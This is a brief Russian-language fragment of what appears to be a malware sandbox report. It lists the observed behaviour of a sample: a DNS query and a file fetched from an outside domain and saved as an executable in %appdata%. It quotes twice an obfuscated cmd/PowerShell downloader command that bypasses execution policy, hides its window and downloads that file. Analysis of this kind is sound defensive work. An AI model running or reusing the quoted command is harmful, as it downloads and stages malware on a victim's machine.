Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERsheLl.ExE -eXecutIonPOLiCY byPASS -nOPROFILE -WindOWsTylE hidDeN (nEW-oBJEcT System.net.WeBcLIENt).DowNloadfiLe('http://www.basopoew.top/read.php?f=1.gif','%APpData%.exe');...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "POWERsheLl.ExE -eXecutIonPOLiCY byPASS -nOPROFILE -WindOWsTylE hidDeN (nEW-oBJEcT System.net.WeBcLIENt).DowNloadfiLe('http://www.basopoew.top/read.php?f=1.gif','%APpData%.exe');...' (со скрытым окном)